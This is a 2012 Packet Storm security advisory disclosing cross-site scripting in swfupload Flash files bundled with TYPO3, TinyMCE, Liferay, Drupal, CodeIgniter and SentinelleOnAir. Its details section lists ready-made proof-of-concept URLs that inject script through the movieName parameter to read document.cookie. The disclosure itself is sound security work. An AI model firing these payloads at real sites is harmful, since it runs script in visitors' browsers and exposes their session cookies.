SWF Upload f10 / f11 Cross Site Scripting

2012-11-25T00:00:00
ID PACKETSTORM:118343
Type packetstorm
Reporter MustLive
Modified 2012-11-25T00:00:00

Description

                                        
                                            `Hello list!  
  
I will draw your attention to XSS vulnerability in other web applications  
with swfupload. This is finial advisory concerning different versions of  
this flash application. Earlier I've wrote about swfupload in Archiv plugin  
for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS,  
AionWeb, Liferay Portal, SurgeMail, symfony and that this hole is available  
in many other web applications.  
  
In previous letters I've wrote concerning web applications with  
swfupload_f8.swf, swfupload_f9.swf and swfupload.swf (which are for Flash  
Player 8, 9 and 10). And now I'll write about web applications with  
swfupload_f10.swf and swfupload_f11.swf (which are for Flash Player 10 and  
11). Here is information about SwfUploadPanel for TYPO3 CMS, Archiv plugin  
for TinyMCE, Liferay Portal (Community Edition, which earlier called  
Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload  
for Codeigniter and SentinelleOnAir - among multiple web applications which  
are bundled with swfupload_f10.swf or swfupload_f11.swf.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are potentially all versions of SwfUploadPanel for TYPO3 CMS,  
Archiv plugin for TinyMCE, Liferay Portal (Community Edition, which earlier  
called Standard Edition, and Enterprise Edition), Swfupload for Drupal,  
SWFUpload for Codeigniter and SentinelleOnAir. There is no information that  
they have fixed this vulnerability in their software (at that this  
vulnerability was fixed in WordPress 3.3.2 at 20.04.2012).  
  
The developers of WordPress released new version of flash file (the same did  
the developers of XenForo), which could be used by all web developers, which  
were using swfupload.  
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
SwfUploadPanel for TYPO3 CMS:  
  
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
Archiv plugin for TinyMCE:  
  
http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
Archiv plugin for TinyMCE also contains swfupload_f10.swf, besides described  
earlier swfupload_f9.swf and swfupload_f8.swf.  
  
Liferay Portal:  
  
http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
Liferay Portal also contains swfupload_f10.swf, besides described earlier  
swfupload_f9.swf and swfupload_f8.swf.  
  
Swfupload for Drupal:  
  
As it can be seen from the project  
http://code.google.com/p/drupal-swfupload/ - there is version of Swfupload  
for Drupal. But exactly in this project there are no files. But they are in  
the project Respectiva (http://code.google.com/p/respectiva/), which is  
Drupal with Swfupload.  
  
http://site/js/libs/swfupload_f10.swf  
  
SWFUpload for Codeigniter:  
  
http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
This is concerning swfupload_f10.swf. And concerning swfupload_f11.swf, then  
in Google's index there is only one project - SentinelleOnAir, which  
contains swfupload_f11.swf.  
  
SentinelleOnAir:  
  
http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`